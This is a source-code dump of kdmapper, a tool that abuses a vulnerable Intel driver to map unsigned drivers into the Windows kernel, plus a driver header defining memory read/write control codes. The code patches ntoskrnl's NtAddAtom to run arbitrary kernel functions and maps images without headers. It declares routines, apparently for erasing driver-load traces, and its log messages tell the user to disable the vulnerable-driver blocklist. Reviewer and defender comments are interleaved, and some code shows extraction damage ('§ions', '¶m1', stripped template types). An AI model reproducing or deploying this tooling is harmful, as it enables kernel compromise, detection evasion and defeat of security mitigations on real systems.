reinterpret_cast(modules->Modules[i].ImageBase); 76 | 77 | VirtualFree(buffer, 0, MEM_RELEASE); 78 | return result; 79 | } 80 | } 81 | 82 | 
VirtualFree(buffer, 0, MEM_RELEASE);
	return 0;
}

// Masked byte comparison. For every position where szMask holds 'x' the byte at
// pData must equal the byte at bMask; any other mask character is a wildcard.
// Walks strlen(szMask) bytes of both buffers; the caller supplies no lengths,
// so nothing here bounds the reads.
BOOLEAN utils::bDataCompare(const BYTE* pData, const BYTE* bMask, const char* szMask) {
	for (; *szMask; ++szMask, ++pData, ++bMask)
		if (*szMask == 'x' && *pData != *bMask)
			return 0;
	return (*szMask) == 0;
}

// Linear scan of [dwAddress, dwAddress + dwLen) for the masked pattern.
// Returns the address of the first match, or 0.
// NOTE(review): max_len is unsigned; a mask longer than dwLen makes the
// subtraction wrap, and the loop then reads far past the intended range.
uintptr_t utils::FindPattern(uintptr_t dwAddress, uintptr_t dwLen, BYTE* bMask, const char* szMask) {
	size_t max_len = dwLen - strlen(szMask);
	for (uintptr_t i = 0; i < max_len; i++)
		if (bDataCompare((BYTE*)(dwAddress + i), bMask, szMask))
			return (uintptr_t)(dwAddress + i);
	return 0;
}

// Looks up a section by name in the PE image mapped at modulePtr and returns
// modulePtr + VirtualAddress (optionally the VirtualSize through `size`), or 0.
// NOTE(review): e_lfanew and the header signatures are used unchecked, and
// strlen() is applied to section->Name, an 8-byte field that carries no
// terminator when the name uses all 8 bytes.
// NOTE(review): "§ions[i]" below looks like extraction damage of "&sections[i]".
PVOID utils::FindSection(const char* sectionName, uintptr_t modulePtr, PULONG size) {
	size_t namelength = strlen(sectionName);
	PIMAGE_NT_HEADERS headers = (PIMAGE_NT_HEADERS)(modulePtr + ((PIMAGE_DOS_HEADER)modulePtr)->e_lfanew);
	PIMAGE_SECTION_HEADER sections = IMAGE_FIRST_SECTION(headers);
	for (DWORD i = 0; i < headers->FileHeader.NumberOfSections; ++i) {
		PIMAGE_SECTION_HEADER section = §ions[i];
		if (memcmp(section->Name, sectionName, namelength) == 0 &&
			namelength == strlen((char*)section->Name)) {
			if (!section->VirtualAddress) {
				return 0;
			}
			if (size) {
				*size = section->Misc.VirtualSize;
			}
			return (PVOID)(modulePtr + section->VirtualAddress);
		}
	}
	return 0;
}

// Returns the directory part of the current executable's path.
// The result of GetModuleFileNameW is not checked, so `buffer` is read
// uninitialised if the call fails.
std::wstring utils::GetCurrentAppFolder() {
	wchar_t buffer[1024];
	GetModuleFileNameW(NULL, buffer, 1024);
	std::wstring::size_type pos = std::wstring(buffer).find_last_of(L"\\/");
	return std::wstring(buffer).substr(0, pos);
}
--------------------------------------------------------------------------------
/kdmapper/service.cpp:
--------------------------------------------------------------------------------
#include "service.hpp"
#include
#include
#include

#include "utils.hpp"
#include "nt.hpp"

// Registers driver_path as a kernel-driver service under
// HKLM\SYSTEM\CurrentControlSet\Services\<serviceName> and loads it with
// nt::NtLoadDriver. Returns true when the load succeeds or the image is
// already loaded.
//
// Defender note: the key is written with plain registry APIs and no
// service-control-manager call appears in this function, so the artefacts to
// look for are the Services key writes (ImagePath with a \??\ prefix, Type = 1),
// the SeLoadDriverPrivilege enable and the driver-load event itself. None of
// the failure paths below removes the key that was created.
bool service::RegisterAndStart(const std::wstring& driver_path, const std::wstring& serviceName) {
	const static DWORD ServiceTypeKernel = 1;
	const std::wstring servicesPath = L"SYSTEM\\CurrentControlSet\\Services\\" + serviceName;
	const std::wstring nPath = L"\\??\\" + driver_path;

	HKEY dservice;
	LSTATUS status = RegCreateKeyW(HKEY_LOCAL_MACHINE, servicesPath.c_str(), &dservice); //Returns Ok if already exists
	if (status != ERROR_SUCCESS) {
		Log("[-] Can't create service key" << std::endl);
		return false;
	}

	status = RegSetKeyValueW(dservice, NULL, L"ImagePath", REG_EXPAND_SZ, nPath.c_str(), (DWORD)(nPath.size()*sizeof(wchar_t)));
	if (status != ERROR_SUCCESS) {
		RegCloseKey(dservice);
		Log("[-] Can't create 'ImagePath' registry value" << std::endl);
		return false;
	}

	status = RegSetKeyValueW(dservice, NULL, L"Type", REG_DWORD, &ServiceTypeKernel, sizeof(DWORD));
	if (status != ERROR_SUCCESS) {
		RegCloseKey(dservice);
		Log("[-] Can't create 'Type' registry value" << std::endl);
		return false;
	}

	RegCloseKey(dservice);

	// The handle is only null-checked; the GetProcAddress lookups are commented out.
	HMODULE ntdll = GetModuleHandleA("ntdll.dll");
	if (ntdll == NULL) {
		return false;
	}

	//auto RtlAdjustPrivilege = (nt::RtlAdjustPrivilege)GetProcAddress(ntdll, "RtlAdjustPrivilege");
	//auto NtLoadDriver = (nt::NtLoadDriver)GetProcAddress(ntdll, "NtLoadDriver");

	// Privilege value 10 is passed to RtlAdjustPrivilege with Enable = TRUE.
	ULONG SE_LOAD_DRIVER_PRIVILEGE = 10UL;
	BOOLEAN SeLoadDriverWasEnabled;
	NTSTATUS Status = nt::RtlAdjustPrivilege(SE_LOAD_DRIVER_PRIVILEGE, TRUE, FALSE, &SeLoadDriverWasEnabled);
	if (!NT_SUCCESS(Status)) {
		Log("Fatal error: failed to acquire SE_LOAD_DRIVER_PRIVILEGE. Make sure you are running as administrator." << std::endl);
		return false;
	}

	std::wstring wdriver_reg_path = L"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\" + serviceName;
	UNICODE_STRING serviceStr;
	RtlInitUnicodeString(&serviceStr, wdriver_reg_path.c_str());

	Status = nt::NtLoadDriver(&serviceStr);


	Log("[+] NtLoadDriver Status 0x" << std::hex << Status << std::endl);

	// 0xC0000603 means the vulnerable-driver blocklist refused the image, i.e.
	// the mitigation worked. The log text points the user at the switch that
	// turns it off; on managed hosts a write of 0 to
	// VulnerableDriverBlocklistEnable under Control\CI\Config is a change
	// worth alerting on.
	if (Status == 0xC0000603) { //STATUS_IMAGE_CERT_REVOKED
		Log("[-] Your vulnerable driver list is enabled and have blocked the driver loading, you must disable vulnerable driver list to use kdmapper with intel driver" << std::endl);
		Log("[-] Registry path to disable vulnerable driver list: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\CI\\Config" << std::endl);
		Log("[-] Set 'VulnerableDriverBlocklistEnable' as dword to 0" << std::endl);
	}
	else if (Status == 0xC0000022 || Status == 0xC000009A) { //STATUS_ACCESS_DENIED and STATUS_INSUFFICIENT_RESOURCES
		Log("[-] Access Denied or Insufficient Resources (0x" << std::hex << Status << "), Probably some anticheat or antivirus running blocking the load of vulnerable driver" << std::endl);
	}


	//Never should occur since kdmapper checks for "IsRunning" driver before
	if (Status == 0xC000010E) {// STATUS_IMAGE_ALREADY_LOADED
		return true;
	}

	return NT_SUCCESS(Status);
}

// Unloads the driver registered under serviceName with nt::NtUnloadDriver and
// deletes its Services key. Returns true when the key does not exist, or when
// both the unload and the key deletion succeed. The key is deleted even when
// the unload fails (the function still returns false in that case), so a
// missing Services key does not show that the driver was unloaded.
bool service::StopAndRemove(const std::wstring& serviceName) {
	HMODULE ntdll = GetModuleHandleA("ntdll.dll");
	if (ntdll == NULL)
		return false;

	std::wstring wdriver_reg_path = L"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\" + serviceName;
	UNICODE_STRING serviceStr;
	RtlInitUnicodeString(&serviceStr, wdriver_reg_path.c_str());

	HKEY driver_service;
	std::wstring servicesPath = L"SYSTEM\\CurrentControlSet\\Services\\" + serviceName;
	LSTATUS status = RegOpenKeyW(HKEY_LOCAL_MACHINE, servicesPath.c_str(), &driver_service);
	if (status != ERROR_SUCCESS) {
		if (status == ERROR_FILE_NOT_FOUND) {
			return true;
		}
		return false;
	}
	RegCloseKey(driver_service);

	NTSTATUS st = nt::NtUnloadDriver(&serviceStr);
	Log("[+] NtUnloadDriver Status 0x" << std::hex << st << std::endl);
	if (st != ERROR_SUCCESS) {
		Log("[-] Driver Unload Failed!!" << std::endl);
		status = RegDeleteTreeW(HKEY_LOCAL_MACHINE, servicesPath.c_str());
		return false; //lets consider unload fail as error because can cause problems with anti cheats later
	}


	status = RegDeleteTreeW(HKEY_LOCAL_MACHINE, servicesPath.c_str());
	if (status != ERROR_SUCCESS) {
		return false;
	}
	return true;
}
--------------------------------------------------------------------------------
/kdmapper/intel_driver.hpp:
--------------------------------------------------------------------------------
#pragma once
#include
#include
#include


#include "utils.hpp"
#include "nt.hpp"

// Operations carried out through a handle to the loaded Intel driver (named
// iqvw64e in the identifiers used across this listing). Only declarations are
// visible here; the bodies live in intel_driver.cpp, which is not shown.
namespace intel_driver
{
	constexpr ULONG32 ioctl1 = 0x80862007;
	constexpr DWORD iqvw64e_timestamp = 0x5284EAC3;
	extern ULONG64 ntoskrnlAddr;


	// The Clear* helpers declared in this header presumably remove records of
	// the driver load (PiDDB cache, MmUnloadedDrivers, hash bucket list,
	// WdFilter list) - inferred from the names, confirm against the bodies.
	// Those are structures forensic tooling reads for driver history, so an
	// empty result there is not evidence that no driver was loaded.
	bool ClearPiDDBCacheTable(HANDLE device_handle);
	bool ExAcquireResourceExclusiveLite(HANDLE device_handle, PVOID Resource, BOOLEAN wait);
	bool ExReleaseResourceLite(HANDLE device_handle, PVOID Resource);
	BOOLEAN RtlDeleteElementGenericTableAvl(HANDLE device_handle, PVOID Table, PVOID Buffer);
	PVOID RtlLookupElementGenericTableAvl(HANDLE device_handle, nt::PRTL_AVL_TABLE Table, PVOID Buffer);
	nt::PiDDBCacheEntry* LookupEntry(HANDLE device_handle, nt::PRTL_AVL_TABLE PiDDBCacheTable, ULONG timestamp, const wchar_t * name);
	PVOID ResolveRelativeAddress(HANDLE device_handle, _In_ PVOID Instruction, _In_ ULONG OffsetOffset, _In_ ULONG InstructionSize);
	bool AcquireDebugPrivilege();

	uintptr_t
FindPatternAtKernel(HANDLE device_handle, uintptr_t dwAddress, uintptr_t dwLen, BYTE* bMask, const char* szMask);
	uintptr_t FindSectionAtKernel(HANDLE device_handle, const char* sectionName, uintptr_t modulePtr, PULONG size);
	uintptr_t FindPatternInSectionAtKernel(HANDLE device_handle, const char* sectionName, uintptr_t modulePtr, BYTE* bMask, const char* szMask);

	bool ClearKernelHashBucketList(HANDLE device_handle);
	bool ClearWdFilterDriverList(HANDLE device_handle);

	bool IsRunning();
	HANDLE Load();
	bool Unload(HANDLE device_handle);

	// Kernel memory primitives exposed through the driver handle. Bodies are
	// not in this listing; the signatures take raw 64-bit kernel or physical
	// addresses supplied by the user-mode caller.
	bool MemCopy(HANDLE device_handle, uint64_t destination, uint64_t source, uint64_t size);
	bool SetMemory(HANDLE device_handle, uint64_t address, uint32_t value, uint64_t size);
	bool GetPhysicalAddress(HANDLE device_handle, uint64_t address, uint64_t* out_physical_address);
	uint64_t MapIoSpace(HANDLE device_handle, uint64_t physical_address, uint32_t size);
	bool UnmapIoSpace(HANDLE device_handle, uint64_t address, uint32_t size);
	bool ReadMemory(HANDLE device_handle, uint64_t address, void* buffer, uint64_t size);
	bool WriteMemory(HANDLE device_handle, uint64_t address, void* buffer, uint64_t size);
	bool WriteToReadOnlyMemory(HANDLE device_handle, uint64_t address, void* buffer, uint32_t size);
	/*added by herooyyy*/
	uint64_t MmAllocateIndependentPagesEx(HANDLE device_handle, uint32_t size);
	bool MmFreeIndependentPages(HANDLE device_handle, uint64_t address, uint32_t size);
	BOOLEAN MmSetPageProtection(HANDLE device_handle, uint64_t address, uint32_t size, ULONG new_protect);

	uint64_t AllocatePool(HANDLE device_handle, nt::POOL_TYPE pool_type, uint64_t size);

	bool FreePool(HANDLE device_handle, uint64_t address);
	uint64_t GetKernelModuleExport(HANDLE device_handle, uint64_t kernel_module_base, const std::string& function_name);
	bool ClearMmUnloadedDrivers(HANDLE device_handle);
	std::wstring GetDriverNameW();
	std::wstring GetDriverPath();

	// Calls kernel_function_address with at most four arguments and stores the
	// result in *out_result (ignored when T is void). Returns false when an
	// argument is null, a lookup fails, or a memory read/write through the
	// driver handle fails.
	//
	// Mechanism visible in the body: the first 12 bytes of ntoskrnl's NtAddAtom
	// are saved, overwritten with `mov rax, imm64; jmp rax` (48 b8 <addr> ff e0)
	// pointing at the target, the user-mode ntdll NtAddAtom export is then
	// called so the system call lands on the patched bytes, and the saved
	// bytes are written back.
	//
	// Risk notes for reviewers and defenders:
	//  - This modifies ntoskrnl code bytes, which is the kind of change that
	//    integrity checks on kernel text are designed to catch.
	//  - Nothing in this function synchronises with other callers: any thread
	//    that enters NtAddAtom between the two writes runs the redirected code.
	//  - The restore only runs if the call returns; a fault in the target
	//    leaves the patch in place.
	//
	// NOTE(review): angle-bracket contents (the template parameter list, the
	// std::is_same_v arguments and the reinterpret_cast target types) appear
	// to have been stripped when this listing was extracted.
	template
	bool CallKernelFunction(HANDLE device_handle, T* out_result, uint64_t kernel_function_address, const A ...arguments) {
		constexpr auto call_void = std::is_same_v;

		//if count of arguments is >4 fail
		static_assert(sizeof...(A) <= 4, "CallKernelFunction: Too many arguments, CallKernelFunction only can be called with 4 or less arguments");

		if constexpr (!call_void) {
			if (!out_result)
				return false;
		}
		else {
			UNREFERENCED_PARAMETER(out_result);
		}

		if (!kernel_function_address)
			return false;

		// Setup function call
		HMODULE ntdll = GetModuleHandleA("ntdll.dll");
		if (ntdll == 0) {
			Log(L"[-] Failed to load ntdll.dll" << std::endl); //never should happens
			return false;
		}

		const auto NtAddAtom = reinterpret_cast(GetProcAddress(ntdll, "NtAddAtom"));
		if (!NtAddAtom)
		{
			Log(L"[-] Failed to get export ntdll.NtAddAtom" << std::endl);
			return false;
		}

		// 48 b8 imm64 / ff e0: the imm64 slot at offset 2 is filled in below.
		uint8_t kernel_injected_jmp[] = { 0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xe0 };
		uint8_t original_kernel_function[sizeof(kernel_injected_jmp)];
		*(uint64_t*)&kernel_injected_jmp[2] = kernel_function_address;

		// Function-local static: resolved once and reused by later calls of
		// the same template instantiation, including a 0 from a failed lookup.
		static uint64_t kernel_NtAddAtom = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "NtAddAtom");
		if (!kernel_NtAddAtom) {
			Log(L"[-] Failed to get export ntoskrnl.NtAddAtom" << std::endl);
			return false;
		}

		if (!ReadMemory(device_handle, kernel_NtAddAtom, &original_kernel_function, sizeof(kernel_injected_jmp)))
			return false;

		// Refuse to proceed if the first and last two bytes already match the
		// jump stub, i.e. the function is currently patched.
		if (original_kernel_function[0] == kernel_injected_jmp[0] &&
			original_kernel_function[1] == kernel_injected_jmp[1] &&
			original_kernel_function[sizeof(kernel_injected_jmp) - 2] == kernel_injected_jmp[sizeof(kernel_injected_jmp) - 2] &&
original_kernel_function[sizeof(kernel_injected_jmp) - 1] == kernel_injected_jmp[sizeof(kernel_injected_jmp) - 1]) { 107 | Log(L"[-] FAILED!: The code was already hooked!! another instance of kdmapper running?!" << std::endl); 108 | return false; 109 | } 110 | 111 | // Overwrite the pointer with kernel_function_address 112 | if (!WriteToReadOnlyMemory(device_handle, kernel_NtAddAtom, &kernel_injected_jmp, sizeof(kernel_injected_jmp))) 113 | return false; 114 | 115 | // Call function 116 | if constexpr (!call_void) { 117 | using FunctionFn = T(__stdcall*)(A...); 118 | const auto Function = reinterpret_cast(NtAddAtom); 119 | 120 | *out_result = Function(arguments...); 121 | } 122 | else { 123 | using FunctionFn = void(__stdcall*)(A...); 124 | const auto Function = reinterpret_cast(NtAddAtom); 125 | 126 | Function(arguments...); 127 | } 128 | 129 | // Restore the pointer/jmp 130 | return WriteToReadOnlyMemory(device_handle, kernel_NtAddAtom, original_kernel_function, sizeof(kernel_injected_jmp)); 131 | } 132 | } 133 | -------------------------------------------------------------------------------- /project/driver.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | x64 7 | 8 | 9 | DllMode 10 | ARM64 11 | 12 | 13 | DllMode 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | Debug 22 | ARM64 23 | 24 | 25 | Release 26 | ARM64 27 | 28 | 29 | 30 | {D59F7487-8398-D47A-449B-5D462CE5E701} 31 | {1bc93793-694f-48fe-9372-81e2b05556fd} 32 | v4.5 33 | 12.0 34 | Debug 35 | x64 36 | driver 37 | $(LatestTargetPlatformVersion) 38 | driver 39 | 40 | 41 | 42 | Windows10 43 | true 44 | WindowsKernelModeDriver10.0 45 | Driver 46 | KMDF 47 | Universal 48 | 49 | 50 | Windows10 51 | false 52 | WindowsKernelModeDriver10.0 53 | Driver 54 | KMDF 55 | Universal 56 | Spectre 57 | 58 | 59 | Windows10 60 | true 61 | WindowsKernelModeDriver10.0 62 | Driver 63 | KMDF 64 | Universal 65 | 66 | 67 | Windows10 68 | false 69 | 
WindowsKernelModeDriver10.0 70 | Driver 71 | KMDF 72 | Universal 73 | 74 | 75 | 76 | 77 | 78 | v143 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | DbgengKernelDebugger 90 | $(SolutionDir)build\driver\ 91 | $(SolutionDir)intermediates\driver\ 92 | 93 | 94 | DbgengKernelDebugger 95 | $(SolutionDir)build\driver\ 96 | $(SolutionDir)intermediates\driver\ 97 | 98 | 99 | DbgengKernelDebugger 100 | 101 | 102 | DbgengKernelDebugger 103 | 104 | 105 | 106 | sha256 107 | 108 | 109 | 110 | 111 | sha256 112 | 113 | 114 | DriverEntry 115 | false 116 | ntoskrnl.lib;%(AdditionalDependencies) 117 | 118 | 119 | false 120 | false 121 | 122 | 123 | 124 | 125 | sha256 126 | 127 | 128 | 129 | 130 | sha256 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | -------------------------------------------------------------------------------- /kdmapper/kdmapper.cpp: -------------------------------------------------------------------------------- 1 | #include "kdmapper.hpp" 2 | #include 3 | #include 4 | 5 | #include "utils.hpp" 6 | #include "intel_driver.hpp" 7 | #include "nt.hpp" 8 | #include "portable_executable.hpp" 9 | 10 | ULONG64 AllocIndependentPages(HANDLE device_handle, ULONG32 size) 11 | { 12 | const auto base = intel_driver::MmAllocateIndependentPagesEx(device_handle, size); 13 | if (!base) 14 | { 15 | Log(L"[-] Error allocating independent pages" << std::endl); 16 | return 0; 17 | } 18 | 19 | if (!intel_driver::MmSetPageProtection(device_handle, base, size, PAGE_EXECUTE_READWRITE)) 20 | { 21 | Log(L"[-] Failed to change page protections" << std::endl); 22 | intel_driver::MmFreeIndependentPages(device_handle, base, size); 23 | return 0; 24 | } 25 | 26 | return base; 27 | } 28 | 29 | void RelocateImageByDelta(portable_executable::vec_relocs relocs, const ULONG64 delta) { 30 | for (const auto& current_reloc : relocs) { 31 | for (auto i = 0u; i < current_reloc.count; ++i) { 32 | const uint16_t type = 
current_reloc.item[i] >> 12;
			const uint16_t offset = current_reloc.item[i] & 0xFFF;

			// Only DIR64 fixups are applied; every other relocation type is ignored.
			if (type == IMAGE_REL_BASED_DIR64)
				*reinterpret_cast(current_reloc.address + offset) += delta;
		}
	}
}

// Fix cookie by @Jerem584
// Replaces the default /GS security cookie in the locally staged image.
// Returns true when the cookie was rewritten or when the image has no load
// config directory / no cookie; false when the NT headers are missing or the
// cookie slot does not hold the default value 0x2B992DDFA232.
// NOTE(review): the replacement is the default value XORed with the mapper's
// process and thread ids, so it is predictable rather than random; the mapped
// image gets weaker stack-overrun protection than a normally loaded driver.
// NOTE(review): the SecurityCookie address is translated into the local buffer
// and dereferenced without a bounds check against the image size.
bool FixSecurityCookie(void* local_image, ULONG64 kernel_image_base)
{
	auto headers = portable_executable::GetNtHeaders(local_image);
	if (!headers)
		return false;

	auto load_config_directory = headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG].VirtualAddress;
	if (!load_config_directory)
	{
		Log(L"[+] Load config directory wasn't found, probably StackCookie not defined, fix cookie skipped" << std::endl);
		return true;
	}

	auto load_config_struct = (PIMAGE_LOAD_CONFIG_DIRECTORY)((uintptr_t)local_image + load_config_directory);
	auto stack_cookie = load_config_struct->SecurityCookie;
	if (!stack_cookie)
	{
		Log(L"[+] StackCookie not defined, fix cookie skipped" << std::endl);
		return true; // as I said, it is not an error and we should allow that behavior
	}

	stack_cookie = stack_cookie - (uintptr_t)kernel_image_base + (uintptr_t)local_image; //since our local image is already relocated the base returned will be kernel address

	if (*(uintptr_t*)(stack_cookie) != 0x2B992DDFA232) {
		Log(L"[-] StackCookie already fixed!? this probably wrong" << std::endl);
		return false;
	}

	Log(L"[+] Fixing stack cookie" << std::endl);

	auto new_cookie = 0x2B992DDFA232 ^ GetCurrentProcessId() ^ GetCurrentThreadId(); // here we don't really care about the value of stack cookie, it will still works and produce nice result
	if (new_cookie == 0x2B992DDFA232)
		new_cookie = 0x2B992DDFA233;

	*(uintptr_t*)(stack_cookie) = new_cookie; // the _security_cookie_complement will be init by the driver itself if they use crt
	return true;
}

// Fills the import address slots of the staged image. Each module is located
// with utils::GetKernelModuleAddress and each function with
// intel_driver::GetKernelModuleExport, falling back to ntoskrnl when the
// named module does not export it. Returns false when a module or function
// cannot be resolved.
// NOTE(review): when the module is ntoskrnl itself and the lookup fails, the
// fallback is skipped and 0 is stored in the slot while the function still
// returns true.
bool ResolveImports(HANDLE iqvw64e_device_handle, portable_executable::vec_imports imports) {
	for (const auto& current_import : imports) {
		ULONG64 Module = utils::GetKernelModuleAddress(current_import.module_name);
		if (!Module) {
#if !defined(DISABLE_OUTPUT)
			std::cout << "[-] Dependency " << current_import.module_name << " wasn't found" << std::endl;
#endif
			return false;
		}

		for (auto& current_function_data : current_import.function_datas) {
			ULONG64 function_address = intel_driver::GetKernelModuleExport(iqvw64e_device_handle, Module, current_function_data.name);

			if (!function_address) {
				//Lets try with ntoskrnl
				if (Module != intel_driver::ntoskrnlAddr) {
					function_address = intel_driver::GetKernelModuleExport(iqvw64e_device_handle, intel_driver::ntoskrnlAddr, current_function_data.name);
					if (!function_address) {
#if !defined(DISABLE_OUTPUT)
						std::cout << "[-] Failed to resolve import " << current_function_data.name << " (" << current_import.module_name << ")" << std::endl;
#endif
						return false;
					}
				}
			}

			*current_function_data.address = function_address;
		}
	}

	return true;
}

// Stages the PE image in `data`, copies it into a kernel allocation obtained
// through the driver handle and calls its entry point.
//
// Steps visible in the body: check NT headers and the PE32+ magic; allocate a
// local read/write staging buffer of SizeOfImage; allocate kernel memory
// (independent pages or NonPagedPool) of image_size, which excludes the header
// region when destroyHeader is set; copy headers and initialised sections;
// apply relocations for the kernel base; fix the security cookie; resolve
// imports; write the staged image with intel_driver::WriteMemory; run the
// optional callback; call the entry point through CallKernelFunction with
// (realBase or param1, param2); optionally free the kernel allocation.
//
// Returns the kernel allocation address (realBase) on success and 0 on
// failure. *exitCode, when given, receives the entry point's NTSTATUS.
//
// Defender notes:
//  - The image is placed by a memory write and entered by a direct call; the
//    Windows driver load path is not used for it anywhere in this function,
//    so telemetry tied to image-load notifications presumably does not see it.
//  - With destroyHeader the header region is not written to the kernel copy,
//    so scans that key on PE headers will not match the allocation.
//
// NOTE(review): `data` arrives without a length. SizeOfHeaders, and each
// section's VirtualAddress, PointerToRawData and SizeOfRawData, are used in
// memcpy without being checked against the staging buffer or the input, so a
// malformed image can read or write out of bounds in this process.
// NOTE(review): the `return 0` after a FixSecurityCookie failure leaves the
// do/while without releasing local_image_base or the kernel allocation; the
// other failure paths use `break` and are cleaned up below the loop.
// NOTE(review): "reinterpret_cast(" without a target type and "¶m1" /
// "¶m2" look like extraction damage ("&param1", "&param2").
ULONG64 kdmapper::MapDriver(HANDLE iqvw64e_device_handle, BYTE* data, ULONG64 param1, ULONG64 param2, bool free, bool destroyHeader, AllocationMode mode, bool PassAllocationAddressAsFirstParam, mapCallback callback, NTSTATUS* exitCode) {

	const PIMAGE_NT_HEADERS64 nt_headers = portable_executable::GetNtHeaders(data);

	if (!nt_headers) {
		Log(L"[-] Invalid format of PE image" << std::endl);
		return 0;
	}

	if (nt_headers->OptionalHeader.Magic != IMAGE_NT_OPTIONAL_HDR64_MAGIC) {
		Log(L"[-] Image is not 64 bit" << std::endl);
		return 0;
	}

	ULONG32 image_size = nt_headers->OptionalHeader.SizeOfImage;

	void* local_image_base = VirtualAlloc(nullptr, image_size, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
	if (!local_image_base)
		return 0;

	// The first section's VirtualAddress is taken as the size of the header region.
	DWORD TotalVirtualHeaderSize = (IMAGE_FIRST_SECTION(nt_headers))->VirtualAddress;
	image_size = image_size - (destroyHeader ? TotalVirtualHeaderSize : 0);

	ULONG64 kernel_image_base = 0;
	if (mode == AllocationMode::AllocateIndependentPages) {
		kernel_image_base = AllocIndependentPages(iqvw64e_device_handle, image_size);
	}
	else { // AllocatePool by default
		kernel_image_base = intel_driver::AllocatePool(iqvw64e_device_handle, nt::POOL_TYPE::NonPagedPool, image_size);
	}

	if (!kernel_image_base) {
		Log(L"[-] Failed to allocate remote image in kernel" << std::endl);

		VirtualFree(local_image_base, 0, MEM_RELEASE);
		return 0;
	}

	do {
		Log(L"[+] Image base has been allocated at 0x" << reinterpret_cast(kernel_image_base) << std::endl);

		// Copy image headers

		memcpy(local_image_base, data, nt_headers->OptionalHeader.SizeOfHeaders);

		// Copy image sections

		const PIMAGE_SECTION_HEADER current_image_section = IMAGE_FIRST_SECTION(nt_headers);

		for (auto i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
			if ((current_image_section[i].Characteristics & IMAGE_SCN_CNT_UNINITIALIZED_DATA) > 0)
				continue;
			auto local_section = reinterpret_cast(reinterpret_cast(local_image_base) + current_image_section[i].VirtualAddress);
			memcpy(local_section, reinterpret_cast(reinterpret_cast(data) + current_image_section[i].PointerToRawData), current_image_section[i].SizeOfRawData);
		}

		// realBase is the start of the kernel allocation. With destroyHeader,
		// kernel_image_base is moved back by the header size so that RVAs
		// still resolve although the headers are not copied.
		ULONG64 realBase = kernel_image_base;
		if (destroyHeader) {
			kernel_image_base -= TotalVirtualHeaderSize;
			Log(L"[+] Skipped 0x" << std::hex << TotalVirtualHeaderSize << L" bytes of PE Header" << std::endl);
		}

		// Resolve relocs and imports

		RelocateImageByDelta(portable_executable::GetRelocs(local_image_base), kernel_image_base - nt_headers->OptionalHeader.ImageBase);

		if (!FixSecurityCookie(local_image_base, kernel_image_base ))
		{
			Log(L"[-] Failed to fix cookie" << std::endl);
			return 0;
		}

		if (!ResolveImports(iqvw64e_device_handle, portable_executable::GetImports(local_image_base))) {
			Log(L"[-] Failed to resolve imports" << std::endl);
			kernel_image_base = realBase;
			break;
		}

		// Write fixed image to kernel

		if (!intel_driver::WriteMemory(iqvw64e_device_handle, realBase, (PVOID)((uintptr_t)local_image_base + (destroyHeader ? TotalVirtualHeaderSize : 0)), image_size)) {
			Log(L"[-] Failed to write local image to remote image" << std::endl);
			kernel_image_base = realBase;
			break;
		}

		// Call driver entry point

		const ULONG64 address_of_entry_point = kernel_image_base + nt_headers->OptionalHeader.AddressOfEntryPoint;

		Log(L"[<] Calling DriverEntry 0x" << reinterpret_cast(address_of_entry_point) << std::endl);

		if (callback) {
			if (!callback(¶m1, ¶m2, realBase, image_size)) {
				Log(L"[-] Callback returns false, failed!" << std::endl);
				kernel_image_base = realBase;
				break;
			}
		}

		NTSTATUS status = 0;
		if (!intel_driver::CallKernelFunction(iqvw64e_device_handle, &status, address_of_entry_point, (PassAllocationAddressAsFirstParam ? realBase : param1), param2)) {
			Log(L"[-] Failed to call driver entry" << std::endl);
			kernel_image_base = realBase;
			break;
		}

		if (exitCode)
			*exitCode = status;

		Log(L"[+] DriverEntry returned 0x" << std::hex << status << std::endl);

		// Free memory
		if (free) {
			Log(L"[+] Freeing memory" << std::endl);
			bool free_status = false;

			if (mode == AllocationMode::AllocateIndependentPages)
			{
				free_status = intel_driver::MmFreeIndependentPages(iqvw64e_device_handle, realBase, image_size);
			}
			else {
				free_status = intel_driver::FreePool(iqvw64e_device_handle, realBase);
			}

			if (free_status) {
				Log(L"[+] Memory has been released" << std::endl);
			}
			else {
				Log(L"[-] WARNING: Failed to free memory!" << std::endl);
			}
		}



		VirtualFree(local_image_base, 0, MEM_RELEASE);
		return realBase;

	} while (false);


	// Failure path reached through `break`: release the staging buffer and
	// the kernel allocation.
	VirtualFree(local_image_base, 0, MEM_RELEASE);

	Log(L"[+] Freeing memory" << std::endl);
	bool free_status = false;

	if (mode == AllocationMode::AllocateIndependentPages)
	{
		free_status = intel_driver::MmFreeIndependentPages(iqvw64e_device_handle, kernel_image_base, image_size);
	}
	else {
		free_status = intel_driver::FreePool(iqvw64e_device_handle, kernel_image_base);
	}

	if (free_status) {
		Log(L"[+] Memory has been released" << std::endl);
	}
	else {
		Log(L"[-] WARNING: Failed to free memory!" << std::endl);
	}

	return 0;
}


--------------------------------------------------------------------------------
/project/source/definitions.h:
--------------------------------------------------------------------------------
#pragma once

#include "winver.h"

// Name constants. These fixed object names are stable indicators for the
// driver object, device object and symbolic link this driver creates.
#define DRIVER_NAME L"\\Driver\\RickOwens00"
#define DEVICE_NAME L"\\Device\\RickOwens00"
#define SYMBOLIC_LINK L"\\DosDevices\\RickOwens00"

// Control codes
#define PRW_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec33, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) // physical read/write
#define VRW_ATTACH_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec34, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) // virtual read/write attach code
#define VRW_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec35, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) // virtual read/write
